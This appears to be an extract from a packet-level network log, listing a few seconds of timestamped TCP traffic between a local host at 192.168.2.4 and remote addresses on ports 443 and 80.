                                                                                                Oct 27, 2024 17:11:16.524161100 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.524513006 CET57800443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.524796009 CET57800443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.524823904 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.562407017 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.562802076 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.562835932 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.563345909 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.563358068 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.563880920 CET8057795152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.563966990 CET5779580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:16.582752943 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.582904100 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.583005905 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.583193064 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.583209038 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.583224058 CET57796443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.583230019 CET4435779613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.586364985 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.586487055 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.586765051 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.586937904 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.586975098 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.693753958 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.693909883 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.694009066 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.694318056 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.694318056 CET57797443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.694349051 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.694375038 CET4435779713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.696346045 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.696405888 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:16.696978092 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.697084904 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:16.697115898 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.045978069 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.068510056 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.083367109 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.083405018 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.084117889 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.084125996 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.107218981 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.107269049 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.107626915 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.107641935 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.209620953 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.209681988 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.209744930 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.209774971 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.209851980 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.209906101 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.210654020 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.210669041 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.210702896 CET57798443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.210709095 CET4435779813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.213953972 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.214050055 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.214150906 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.216078043 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.216114998 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.233025074 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.233081102 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.233140945 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.233165979 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.233201027 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.233225107 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.233253956 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.233289003 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.233316898 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.233340025 CET57799443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.233354092 CET4435779913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.235280037 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.235307932 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.235526085 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.235651970 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.235666037 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.260447979 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.260956049 CET57800443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.260982037 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.261217117 CET57800443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.261228085 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.324381113 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.324738026 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.324769020 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.325129986 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.325141907 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.401942968 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.401957989 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.401993990 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.402103901 CET57800443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.402221918 CET57800443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.402251959 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.402292967 CET57800443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.402307987 CET4435780013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.404079914 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.404122114 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.404210091 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.404311895 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.404329062 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.431401014 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.435132027 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.435151100 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.435514927 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.435525894 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.454117060 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.454272985 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.454423904 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.454423904 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.454492092 CET57801443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.454524040 CET4435780113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.456769943 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.456816912 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.456902981 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.457148075 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.457161903 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.562542915 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.562701941 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.562808990 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.563054085 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.563083887 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.563152075 CET57802443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.563165903 CET4435780213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.564924002 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.564975977 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.565069914 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.565176010 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.565200090 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.959737062 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.960280895 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.960342884 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.960732937 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.960747004 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.969661951 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.969989061 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.970002890 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:17.970367908 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:17.970372915 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.069788933 CET5779580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:18.070063114 CET5780880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:18.075469971 CET8057808152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.075653076 CET5780880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:18.075803041 CET5780880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:18.075963020 CET8057795152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.076037884 CET5779580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:18.081756115 CET8057808152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.092502117 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.092664003 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.092729092 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.092833996 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.092833996 CET57803443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.092866898 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.092890024 CET4435780313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.095042944 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.095093012 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.095202923 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.095304012 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.095338106 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.102014065 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.102092981 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.102154970 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.102226019 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.102235079 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.102272034 CET57804443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.102277040 CET4435780413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.104141951 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.104193926 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.104274035 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.104361057 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.104388952 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.135184050 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.135591984 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.135643959 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.136001110 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.136017084 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.205478907 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.205801010 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.205812931 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.206166029 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.206171036 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.270230055 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.270371914 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.270426989 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.270498991 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.270519018 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.270530939 CET57805443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.270538092 CET4435780513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.273144960 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.273171902 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.273233891 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.273354053 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.273369074 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.297368050 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.297759056 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.297797918 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.298176050 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.298187017 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.339986086 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.340131044 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.340193987 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.340221882 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.340234041 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.340243101 CET57806443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.340248108 CET4435780613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.342134953 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.342164993 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.342231035 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.342371941 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.342386007 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.431637049 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.431781054 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.431845903 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.431906939 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.431924105 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.431937933 CET57807443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.431943893 CET4435780713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.433821917 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.433841944 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.433916092 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.434037924 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.434048891 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.865592957 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.866400003 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.866457939 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.866816998 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.866832018 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.955905914 CET8057808152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.955990076 CET5780880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:18.997858047 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.998226881 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.998253107 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.998574972 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.998586893 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.998999119 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.999090910 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.999160051 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.999236107 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.999236107 CET57810443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:18.999273062 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:18.999298096 CET4435781013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.001601934 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.001642942 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.001724958 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.001844883 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.001861095 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.010756969 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.011051893 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.011085987 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.011383057 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.011393070 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.091063976 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.091387033 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.091409922 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.091731071 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.091742039 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.132273912 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.132448912 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.132519960 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.132586956 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.132586956 CET57809443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.132616997 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.132641077 CET4435780913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.134691954 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.134728909 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.134809017 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.134903908 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.134916067 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.142162085 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.142210007 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.142263889 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.142388105 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.142388105 CET57811443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.142404079 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.142424107 CET4435781113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.144223928 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.144263029 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.144359112 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.144464016 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.144479990 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.188692093 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.189086914 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.189107895 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.189532042 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.189538002 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.222848892 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.222909927 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.222970009 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.223002911 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.223033905 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.223094940 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.223303080 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.223347902 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.223382950 CET57812443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.223397970 CET4435781213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.232501030 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.232541084 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.232598066 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.232805967 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.232824087 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.324675083 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.324871063 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.324945927 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.324990988 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.325010061 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.325021982 CET57813443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.325028896 CET4435781313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.327159882 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.327229977 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.327307940 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.327445984 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.327467918 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.738794088 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.739324093 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.739357948 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:19.739795923 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:19.739801884 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.191968918 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.192044973 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.192152023 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.192281961 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.192281961 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.193636894 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.202620029 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.203257084 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.203999996 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.204044104 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.204428911 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.204435110 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.204600096 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.204644918 CET4435781413.107.246.51192.168.2.4
